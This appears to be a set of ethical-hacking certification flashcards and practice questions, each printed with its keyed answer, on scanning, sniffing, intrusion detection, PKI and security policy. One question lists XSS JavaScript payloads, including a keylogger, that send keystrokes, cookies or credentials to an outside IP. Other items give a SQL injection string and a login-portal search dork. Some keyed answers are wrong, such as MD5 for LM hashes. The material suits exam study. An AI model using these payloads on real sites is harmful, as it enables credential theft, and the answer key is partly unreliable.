You are testing a web application for a travel service. The web application uses a back-end database to store customer accounts and itineraries. You enter the following username value into the customer registration form: ' or 1=1 -- Which type of attack are you attempting? A)XSS B)SQL injection C)SYN Flood D)CSRF
Network Tools Pro
_____ assists in troubleshooting, diagnosing, monitoring and discovering devices on the network
D)Enforce the company security policy.
You are the security administrator for your company. You write security policies and conduct assessments to protect the company's network. An IT technician reports that he has discovered an unauthorized wireless access point attached to the company network. An employee has used the wireless access point to connect several of his personal devices to the network. Employees are not allowed to connect any personal devices to the network without prior consent from their supervisor and the IT department head. The employee explains that he used the wireless access point because he needed company data on his personal devices. What should you do? A)Configure the firewall to prevent such incidents in the future. B)Allow the devices to remain attached because the reason is sound. C)Configure the IDS to prevent such incidents in the future. D)Enforce the company security policy.
C)Network sniffer
You are thinking like a potential attacker. MAC flooding can compromise the security of your network switches. Once the attack is successful, the attacker could capture sensitive data being transmitted between other computers. Which other tool would an attacker need to complete this objective? A)Password cracker B)Vulnerability scanner C)Network sniffer D)Port scanner
A)yes
You are using NetCat to send TCP messages between two Linux hosts. Both hosts should keep sending data until the either host terminates the session. Which Linux command should you pipe to NetCat? A)yes B)echo C)wait D)tar
B)Layer 2 broadcast frame
You are using a sniffer and you see a frame with a destination address of 0xFFFFFFFFFFFF. What type of frame is this? A)Layer 3 broadcast address B)Layer 2 broadcast frame C)Layer 3 network ID D)Layer 2 network ID
C)The host decrements the TTL value by one and forwards the packet to the next host.
You are using traceroute to map the route packets travel over a network. Which of the following statements is true when using this tool? A)The host decrements the TTL value by one and returns the packet to the previous host. B)The host increments the TTL value by one and forwards the packet to the next host. C)The host decrements the TTL value by one and forwards the packet to the next host. D)The host increments the TTL value by one and returns the packet to the previous host.
B)Incident response is part of incident handling, and incident handling is part of incident management.
You are working with another security professional to design your company's incident response procedures. Which of the following statements is true? A)Incident management is part of incident response, and incident response is part of incident handling. B)Incident response is part of incident handling, and incident handling is part of incident management. C)Incident handling is part of incident response, and incident response is part of incident management. D)Incident response is part of incident management, and incident management is part of incident handling.
C)With the POST method and HTTPS (TLS)
You are working with the web site of an online university. The admissions department requires Social Security numbers (SSN) as personally identifiable information (PII) to associate students with their financial aid packages. The student's SSN should not be available to man-in-the-middle attacks. How should the SSNs be sent to the web server? A)With the GET method and HTTPS (SSL) B)With the POST method and HTTP C)With the POST method and HTTPS (TLS) D)With the GET method and HTTP
C)Healthcare records
You are your company's security administrator. Your company has recently opened a new division. The division head explains to you the Privacy Rule for HIPAA. Which type of record is affected by this? A)Employee records B)Credit card records C)Healthcare records D)Financial records
company's infrastructure details
You can gather ____ from job postings
B)Acknowledgement of a data packet
You capture the following TCP frames using Wireshark: 343 61.586595 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 344 61.590149 192.168.1.3 208.44.193.36 TCP 3202 > http [FIN, ACK] Seq=986 Ack=25462 Win=17520 Len=0 345 61.590208 208.44.193.36 192.168.1.3 HTTP HTTP/1.1 404 Not Found (text/html) 346 61.590264 192.168.1.3 208.44.193.36 TCP 3203 > http [RST, ACK] Seq=987 Ack=25797 Win=0 Len=0 347 66.229719 192.168.1.3 208.44.193.36 TCP 3206 > http [SYN] Seq=0 Len=0 MSS=1460 348 66.369449 208.44.193.36 192.168.1.3 TCP http > 3206 [SYN, ACK] Seq=0 Ack=1 Win=1460 Len=0 MSS=1460 349 66.369526 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=1 Ack=1 Win=17520 Len=0 350 66.369745 192.168.1.3 208.44.193.36 HTTP GET /images/product-images/practicetest/Image:cert-312-50.png HTTP/1.1 351 66.736536 208.44.193.36 192.168.1.3 TCP http > 3206 [ACK] Seq=1 Ack=625 Win=63616 Len=0 352 66.913117 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 353 66.927650 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 354 66.927706 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=625 Ack=2025 Win=17520 Len=0 355 66.948746 192.168.1.3 208.44.193.36 TCP 3207 > http [SYN] Seq=0 Len=0 MSS=1460 356 67.145268 208.44.193.36 192.168.1.3 TCP [TCP Previous segment lost] [TCP Segment of a reassembled PDU] What is the purpose of frame 354? A)Final acknowledgement in a TCP handshake B)Acknowledgement of a data packet C)First step in the TCP handshake D)Second step in the TCP handshake
B)126.123.64.0/19
You detect an attempted ICMP echo scan using the broadcast address 126.123.95.255. You need to determine which network devices were potential targets. Which subnet was likely targeted by the scan? A)126.123.64.0/17 B)126.123.64.0/19 C)126.123.64.0/18 D)126.123.64.0/20
D)Sniffs NFS traffic on the network
You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does? A)Discovers hosts and services on a computer network. B)Automates the import of log data from over 200 common network devices C)Floods a switched LAN with random MAC addresses D)Sniffs NFS traffic on the network
Unable to connect to the Internet, but able to connect to other wireless stations
You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected? A)Unable to connect to the Internet or to other wireless stations B)Able to connect to the Internet and to other wireless stations C)Able to connect to the Internet, but unable to connect to other wireless stations D)Unable to connect to the Internet, but able to connect to other wireless stations
A. ip.addr==192.168.22.5 && tcp contains HR_admin
You have a large packet capture file in Wireshark to review. You want to filter traffic to show all packets with an IP address of 192.168.22.5 that contain the string HR_admin. Which of the following filters would accomplish this task? A. ip.addr==192.168.22.5 && tcp contains HR_admin B. ip.addr 192.168.22.5 && "HR_admin" C. ip.addr 192.168.22.5 && tcp string == HR_admin D. ip.addr==192.168.22.5 + tcp contains tide
A. Your IDLE scan results will not be useful to you.
You have a zombie system ready and begin an IDLE scan. As the scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean? A. Your IDLE scan results will not be useful to you. B. The zombie system is a honeypot. C. There is a misbehaving firewall between you and the zombie machine. D. This is an expected result during an IDLE scan.
E)Acquisition
You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase? A)Evaluation B)Identification C)Analyzing D)Generating reports E)Acquisition
C)ISO/IEC 27001:2013
You have been hired as a consultant for a company. You have been asked to provide guidance on establishing, implementing, maintaining, and improving their information security management system. They ask that you provide recommendations based on industry standards. Which of the following standards should you use? A)SOX B)PCI-DSS C)ISO/IEC 27001:2013 D)DMCA
A)Medical
You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you? A)Medical B)Government C)Financial D)Publicly traded
C)Star
You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented? A)Bus B)Ring C)Star D)Mesh
D)Collecting system information
You have been hired as an ethical hacker by your company. You are currently involved in footprinting from outside your company's network. During the most recent analysis, you obtain SNMP information, user, computer and group names and user passwords. Which footprinting objective are you completing? A)Collecting network information B)Collecting organizational information C)Collecting security information D)Collecting system information
A)End-user security training
You have conducted a technical assessment of the network by attempting a number of different social engineering attacks on the network. Which of the following processes is MOST LIKELY to be altered as a result? A)End-user security training B)Physical security C)Password policies D)Access control management
A)Man-in-the-middle attacks
You have decided to implement both client and server PKI certificates to be used by all systems when authenticating to the corporate web site. What type of attack can this help prevent? A)Man-in-the-middle attacks B)Rogue access points C)Smurf attacks D)SYN floods
B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network.
You have recently discovered that an attacker has successfully carried out a session sniffing attack. Which description best describes this attack? A)The attacker masqueraded as a trusted host by using an IP address from within the network being attacked. B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network. C)The attacker inserted malicious coding into a link that appeared to be from a trustworthy source. D)The attacker added SQL code to a Web form input box to gain access to resources or make changes to data.
D)Firewall evasion
You have recently discovered that an attacker used the tcp-over-dns tool on your company's network. What is this tool meant to accomplish in an attack? A)Packet sniffing B)Port scanning C)Vulnerability scanning D)Firewall evasion
A) MD5
You have successfully captured an LM Manager SAM file from an older Windows machine. Which encryption algorithm is used by LM Manager on Windows 2000 SAM file entries? A) MD5 B) MD4 C) SSL D) DES
B) If the right side of the hash ends with 1404EE, the password is less than eight characters
You have successfully copied the LM hash values of passwords on the machine. Which of the following is a true statement? A) If the left side of the hash begins with 1404EE, the password is less than eight characters B) If the right side of the hash ends with 1404EE, the password is less than eight characters C) There is no way to tell whether passwords are less than eight characters; you can't reverse hashes D) There is no way to tell whether passwords are less than eight characters; each hash is always 32 long
B. ARP poisoning to allow you to see messages from Host A to Host B
You have successfully tapped into a network subnet of your target organization. You begin an attack by learning all significant MAC addresses on the subnet. After some time, you decide to intercept messages between two hosts. You begin by sending broadcast messages to Host A showing your MAC address as belonging to Host B. Simultaneously, you send messages to Host B showing your MAC address as belonging to Host A. What is being accomplished here? A. ARP poisoning to allow you to see all messages from either host without interrupting their communications process B. ARP poisoning to allow you to see messages from Host A to Host B C. ARP poisoning to allow you to see messages from Host B to Host A D. ARP poisoning to allow you to see messages from Host A destined to any address E. ARP poisoning to allow you to see messages from Host B destined to any address.
B)File and folder encryption
You manage a network that contains Windows Server 2008 and Windows Vista computers. You have several laptops that are issued to employees when they are working remotely. You decide to implement EFS on the laptop computers. What does this provide? A)Automatic error recovery B)File and folder encryption C)Drive encryption D)File-level security
B)Polymorphic virus
Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application? A)Stealth virus B)Polymorphic virus C)Fast-infecting virus D)Tunneling virus
D)The TTL value is 1, and the destination host is several hops away.
You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur? A)The TTL value is 2, and the source host is one hop away. B)The TTL value is 2, and the destination host is one hop away. C)The TTL value is 1, and the source host is several hops away. D)The TTL value is 1, and the destination host is several hops away.
B)Enumeration of the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP
You run the following command on a Windows computer: FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply" What is the result? A)Enumeration of the alive systems in the last ten IP addresses in the 192.168.1.0 network via ICMP B)Enumeration of the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP C)Enumeration of all the dead systems in the 192.168.1.0 network via ICMP D)Enumeration of all the alive systems in the 192.168.1.0 network via ICMP
B) TCPflow
You want to extract the Application Layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) NMAP
C. nmap -sP 192.168.1.0/24
You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option? A. nmap 192.168.1.0/24 B. nmap -sT 192.168.1.0/24 C. nmap -sP 192.168.1.0/24 D. nmap -P0 192.168.1.0/24
A. Telnet 168.15.22.4 80 C. nc -v -n 168.15.22.4 80
You want to perform banner grabbing against a machine (168.15.22.4) you suspect as being a web server. Assuming you have the correct tools installed, which of the following command-line entries will successfully perform a banner grab? (Choose all that apply.) A. Telnet 168.15.22.4 80 B. Telnet 80 168.15.22.4 C. nc -v -n 168.15.22.4 80 D. nc -v -n 80 168.15.22.4
C. nmap -sS targetIPaddress
You want to run a scan against a target network. You're concerned about it being a reliable scan, with legitimate results, but want to take steps to ensure it is as stealthy as possible. Which scan type is best in this situation? A. nmap -sN targetIPaddress B. nmap -sO targetIPaddress C. nmap -sS targetIPaddress D. nmap -sT targetIPaddress
C)PPTP
You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose? A)GRE B)IPSec C)PPTP D)L2TP
B. Closed
You're running an IDLE scan and send the first packet to the target machine. Next, the SYN/ACK packet is sent to the zombie. The IPID on the return packet from the zombie is 36754. If the starting IPID was 36753, in what state is the port on the target machine? A. Open B. Closed C. Unknown D. None of the above.
E. Anomaly based
Your IDS sits on the network perimeter and has been analyzing traffic for a couple of weeks. On arrival one morning, you find the IDS has alerted on a spike in network traffic late the previous evening. Which type of IDS are you using? A. Stateful B. Snort C. Passive D. Signature based E. Anomaly based
D)Limit interactive logon privileges
Your IT security team defends against privilege escalation with the following countermeasures: -Encryption for sensitive company data -Services run as unprivileged accounts -Multi-factor authentication and authorization Which additional countermeasure would BEST enhance the current defense? A)Patch critical systems regularly B)Implement privilege separation for custom programs C)Perform debugging during stress tests D)Limit interactive logon privileges
D) Cygwin
Your client has some Unix tools he wants to run on a Windows machine. A friend suggests a well known Unix subsystem that can run on Windows for just such a purpose. What is this subsystem called? A) Armitage B) Metasploit C) LILO D) Cygwin
A. Information Security Policy
Your company has a document that spells out exactly what employees are allowed to do on their computer systems. It also defines what is prohibited and what consequences await those who break the rules. A copy of this document is signed by all employees prior to their network access. Which of the following best describes this policy? A. Information Security Policy B. Special Access Policy C. Information Audit Policy D. Network Connection Policy
C)Nessus
Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement. Which tool should you use? A)Wireshark B)Nmap C)Nessus D)Snort
A)ADS Spy B)streams.exe E)SFind
Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.) A)ADS Spy B)streams.exe C)AdsCheck.exe D)ADMutate E)SFind
B)RA
Your company has a public key infrastructure (PKI) implemented to issue digital certificates to users. Users start reporting problems with receiving new certificates. You suspect that the entity responsible for receiving the subject's request and verifying the subject's identity is down. Which entity should you check? A)VA B)RA C)OCSP D)CA
C)Detect and analyze
Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred? A)Classify and prioritize B)Notify C)Detect and analyze D)Contain
C)White hat
Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position? A)Gray hat B)Black hat C)White hat D)Script kiddie
Windows Task Scheduler
___ along with utilities such as 'at' and 'schtasks' can be used to schedule programs that can be executed at a specific date and time
B)External, host-based vulnerability scan
Your company has hired a third party to identify vulnerabilities on the network. Recently, one of the contractors performed a vulnerability scan over the Internet that identified the vulnerabilities on the internal Web server. Which type of vulnerability scan occurred? A)Internal, host-based vulnerability scan B)External, host-based vulnerability scan C)External, application vulnerability scan D)Internal, application vulnerability scan
B)Snort
Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use? A)TCPDump B)Snort C)AirSnort D)Wireshark
A)ESXi C)Hyper-V
Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software are vulnerable to a VM-level attack? (Choose all that apply.) A)ESXi B)Cygwin C)Hyper-V D)XCode E)Wine
D)It will track changes to the files on the server.
Your company has just installed a new Linux file server. You decide to install Tripwire to provide system integrity verification on the file server. Which function will this provide? A)It will provide security checks, including file permissions. B)It will test the system for vulnerabilities. C)It will recover encryption keys. D)It will track changes to the files on the server.
A)HR department
Your company has recently adopted several new security policies. Most of the policies just affect the employees in the IT department. However, one of the policies affects employees in the accounting department. Which entity is responsible for making the employees aware of the new security policies? A)HR department B)IT department C)Departmental managers D)Chief security officer
D)AirSnort
Your company has recently launched several wireless networks at its primary location. Contrary to your suggestions, all the wireless networks use WEP encryption keys. You are concerned that hackers will easily obtain the WEP encryption key. Which tool should you use to demonstrate this vulnerability? A)Netstumbler B)Wireshark C)Nessus D)AirSnort
B)802.1x EAP packets are captured for later replay.
Your company has several wireless networks implemented on its large campus. 802.1x authentication is deployed for all wireless networks through a RADIUS server. Recently, you discovered that one of the wireless networks was the victim of an Extensible AP Replay attack. What occurs during this attack? A)A valid 802.1x EAP exchange is observed so that the attacker can later send a forged EAP-Failure message. B)802.1x EAP packets are captured for later replay. C)User credentials are recovered from captured 802.1x LEAP packets using a dictionary attack tool. D)User identities are captured from cleartext 802.1x Identity Response packets.
Signature-based NIDS
Your company implements two Network Intrusion Detection Systems (NIDS): one anomaly-based and one signature-based. It also implements two Network Intrusion Protection Systems (NIPS): one anomaly-based and one stateful protocol-based. Your company employs an ethical hacker who uses ADMutate to disguise a buffer overflow attack. The attack is attempting to breach the network. Which system is most likely being targeted? A)Signature-based NIDS B)Stateful protocol-based NIPS C)Anomaly-based NIPS D)Anomaly-based NIDS
B)Stateful inspection firewall
Your company needs to implement a firewall. It must be able to discard TCP segments arriving at an open port when they have the header flag of FIN enabled, provided they are the first packet received from the source. Which type of firewall should be implemented? A)Packet filter firewall B)Stateful inspection firewall C)Circuit level firewall D)Web application firewall
C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); };
Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack? A)window.setInterval(function() { new Image().src = 'http://5.45.64.15/index.php?' + Math.floor(Math.random() * 1000) + '=data'; }, 10); B)window.onload = function() { window.location = 'http://5.45.64.15/index.php?data=' + document.cookie; }; C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); }; D)document.forms[0].onsubmit = function() { Window.location = 'http://5.45.64.15/index.php?data=' document.forms[0].username.value + '/' + document.forms[0].password.value; };
B)Password, smart card, retina scan
Your company wants to implement a three-factor access control system. Which of the following would qualify for this implementation? A)PIN, smart card, hardware token B)Password, smart card, retina scan C)PIN, password, smart card D)Fingerprint scan, smart card, retina scan
C)3DES
Your company wants to use symmetric key cryptography in an application it is developing. Which of the following algorithms could be used? A)Diffie-Hellman B)ElGamal C)3DES D)RSA
D)Hiding file data in existing files
Your company's network consists of primarily Windows client and server computers. Recently, management has become concerned with alternate data streams when using NTFS in Windows. What are alternate data streams in Windows? A)Data concealed within another file, message, image, or video B)Automatic file-level encryption C)Optional hard disk-level encryption D)Hiding file data in existing files
C)Go to archive.org
Your company's web site is updated on a regular basis. Over the past three years, the web site has undergone four major updates in response to security issues. One of those major updates was to address a JavaScript vulnerability that allowed SQL injection attacks to occur. A new developer has requested to go back and see the code for the JavaScript vulnerability. However, he discovers that there is no retention of the code for the previous web site versions. How can the developer go back and review the code? A)Review the logs for the web server B)Go to whois.org C)Go to archive.org D)It is not possible to retrieve the old code
Authentication Authorization Accounting (AAA)
___ confirms the identity of the user or device. ___ determines the privileges (rights) of the user or device. ___ records the access attempts, both successful and unsuccessful.
Plist files
___ in MacOS and OS X describe when programs should execute, executable file path, program parameters, required OS permissions, etc.
A)Rolling, displays repeatedly until the script process is killed
Your manager is testing your understanding of the PHP language. She provides you the following code: <?php for (;;) { print "Rolling,"; } ?> She asks you to describe the output. Which description is correct? A)Rolling, displays repeatedly until the script process is killed B)Rolling, displays once C)"Rolling,"; displays repeatedly until the script host automatically reboots D)"Rolling,"; "Rolling,"; displays every 30 seconds E)"Rolling,"; displays once F)Error message displays G)Rolling,Rolling, displays every 30 milliseconds
D. 0.20
Your network contains certain servers that typically fail once every five years. The total cost of one of these servers is $1000. Server technicians are paid $40 per hour, and a typical replacement requires two hours. Ten employees, earning an average of $20 per hour, rely on these servers, and even one of them going down puts the whole group in a wait state until it's brought back up. Which of the following represents the ARO for a server? A. $296 B. $1480 C. $1000 D. 0.20
C)Snort
Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend? A)Nmap B)Nessus C)Snort D)Foundstone
C)Denial of service
Your network just suffered an attack. Nothing was stolen or deleted, but a key file server was unresponsive to users for about 8 hours. What kind of attack did you suffer? A)Social engineering B)IP spoofing C)Denial of service D)Brute force
B)It will allow the scan to evade your border sensor
Your organization has contracted with a third party to perform a penetration test. You have been allowed to observe and ask questions as the test proceeds. At one point you see that the tester is performing a scan of the network from the Internet and tunneling the scan through SSH. What is the purpose of this extra step? A)The scan will complete faster B)It will allow the scan to evade your border sensor C)The scan will gather more complete information D)It will scan devices that allow SSH connections
C)Non-repudiation
Your organization has decided to implement IPSec. One of the important functions you want to implement is its ability to prove where a message originates. Which feature of IPsec provides this function? A)Authentication B)Confidentiality C)Non-repudiation D)Integrity
A)Mandatory access control
Your organization has implemented a two-factor authentication system that includes usernames, passwords, and smart cards. Users are assigned classifications, and access to resources is granted based on the resource's security label. Which access control mechanism does this implement? A)Mandatory access control B)Detective access control C)Role-based access control D)Physical access control
D)A sniffer used to capture password hashes
Your organization implements a network protocol that uses SMB signing. Which attack does this protect against? A)A port scanner used to discover open ports B)A network mapper used to discover which OSs are used on the network C)A vulnerability scanner used to discover network vulnerabilities D)A sniffer used to capture password hashes
D)Vulnerability protection system
Your organization is concerned that patches and updates aren't being deployed in a timely manner. You need to deploy a system that will help with this problem. Which type of system should you deploy? A)Intrusion prevention system B)Network access control C)Network address translation D)Vulnerability protection system
B. BIA (Business Impact Analysis)
Your organization is planning for the future and is identifying the systems and processes critical for their continued operation. Which of the following best describes this effort? A. BCP B. BIA C. DRP D. ALE
A)Immediately
Your organization processes credit card payments and adheres to the requirements of the Payment Card Industry Data Security Standard. Recently, you upgraded the card processing software to a new version. When are you required by the PCI-DSS to perform external and internal penetration testing? A)Immediately B)Within the next year C)At the next yearly test D)Within the next 6 months
B)Privilege escalation
Your security team has implemented the following controls: sensitive data is encrypted; interactive logon privileges are restricted; services run as unprivileged accounts; users and applications operate with the least privileges. Which of the following vulnerabilities are these controls designed to mitigate? A)DoS attacks B)Privilege escalation C)Phishing attacks D)Trojan software
A)Digital signature B)Private key
Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.) A)Digital signature B)Private key C)Public key D)Digital certificate E)Secure web gateway
D. TCP over DNS
Your target subnet is protected by a firewalled DMZ. Reconnaissance shows the external firewall passes some traffic from external to internal, but blocks most communications. HTTP traffic to a web server in the DMZ, which answers to www.somebiz.com, is allowed, along with standard traffic such as DNS queries. Which of the following may provide a method to evade the firewall's protection? A. An ACK scan B. Firewalking C. False positive flooding D. TCP over DNS
D) Fragroute
Your target uses a signature-based IDS. Which of the following allows an attacker to intentionally craft packets that will eventually be correctly assembled by the target, thereby passing through the IDS undetected? A) Defrag B) Tcpfrag C) Netcat D) Fragroute
C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file.
Your team is hired to test a business named Matt's Bait 'n Tackle Shop (domain name mattsBTshop.com). A team member runs the following command: metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html Which of the following best describes what the team member is attempting to do? A. Extract metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format. B. Extract metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format. C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file. D. Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com.
WebSite-Watcher
allows you to automatically check web pages for updates and changes
eMailTrackerPro
analyzes email headers and reveals information such as sender's geographical location, IP address, etc.
The Onion Routing (Tor)
basically works by installing a small client on the machine, which then gets a list of other clients running (this program) from a directory server. The client then bounces Internet requests across random clients to the destination.
PsPasswd
changes account passwords
Social engineers
depend on the fact that people are unaware of their valuable information and are careless about protecting it
1. Know the security posture (footprinting helps make this clear). 2. Reduce the focus area (network range, number of targets, and so on). 3. Identify vulnerabilities. 4. Draw a network map.
describe four main focuses and benefits of footprinting
TCP Connect Scan
detects when a port is open by completing the three-way handshake
PsGetSid
displays the SID of a computer or a user
PsLogList
dump event log records
active footprinting
effort is one that requires the attacker to touch the device, network, or resource
state-sponsored hacker
employed by a government
Colasoft Packet Builder
enables creating custom network packets to audit networks for various attacks
SolarWinds Engineer Toolset's Ping Sweep
enables scanning a range of IP addresses to identify which IP addresses are in use and which ones are currently free. It also performs reverse DNS lookup
PsExec
execute processes remotely
security identifier (SID)
identifies user, group, and computer accounts and follows a specific format.
Vulnerability Scanning
identifies vulnerabilities and weaknesses of a system and network in order to determine how a system can be exploited
VoIP login portals
inurl:8080 intitle:"login" intext:"UserLogin" "English"
Passive Reconnaissance
involves acquiring information without directly interacting with the target.
Passive reconnaissance
involves gathering information about your target without their knowledge.
Active reconnaissance
involves interacting with the target directly by any means
Stealth scan
involves abruptly resetting the TCP connection between client and server before the three-way handshake completes, leaving the connection half open
Ping scan
involves sending ICMP ECHO requests to a host. If the host is live, it will return an ICMP ECHO reply
Recon-ng
is a Web Reconnaissance framework with independent modules, database interaction, built in convenience functions, interactive help, and command completion, that provides an environment in which open source web-based reconnaissance can be conducted
Enterprise Information Security Architecture (EISA)
is a collection of requirements and processes that help determine how an organization's information systems are built and how they work.
DNS records
provide important information about location and type of servers
Baselines
provide the minimum security level necessary.
DNS (Domain Naming System)
provides a name-to-IP-address (and vice versa) mapping service, allowing us to type in a name for a resource as opposed to its address.
SNMPv3
provides encryption for the strings as well as other improvements and options.
The Application layer
provides services to applications, which allow them access to the network. Protocols such as FTP and SMTP reside here.
IP spoofing
refers to changing source IP addresses so that the attack appears to come from someone else
Google hacking
refers to creating complex search queries in order to extract sensitive or hidden information
Hacking
refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to the system resources
passive footprinting
refers to measures to collect information from publicly accessible sources
Spam/Email Steganography
refers to the technique of sending secret messages by hiding them in spam/email messages
information warfare (InfoWar)
refers to the use of information and communication technologies (ICT) to take competitive advantages over an opponent
ARP (Address Resolution Protocol)
resolves IP addresses to machine (MAC) addresses.
802.11b
runs at up to 11 Mbps at 2.4 GHz
802.11g
runs at up to 54 Mbps at 2.4 GHz
Censys
search engine enables researchers to ask questions about the hosts and networks that compose the Internet
SHODAN
search engine lets you find connected devices (routers, servers, IoT, etc.) using a variety of filters
Scanning and enumeration
security professionals take the information they gathered in recon and actively apply tools and techniques to gather more in-depth information on the targets.
finance.google.com
shows you company news releases on a timeline of the company's stock performance, in effect showing you when key milestones occurred. Where can this be found?
Masking and Filtering
techniques hide data using a method similar to watermarks on actual paper; this can be done by modifying the luminance of parts of the image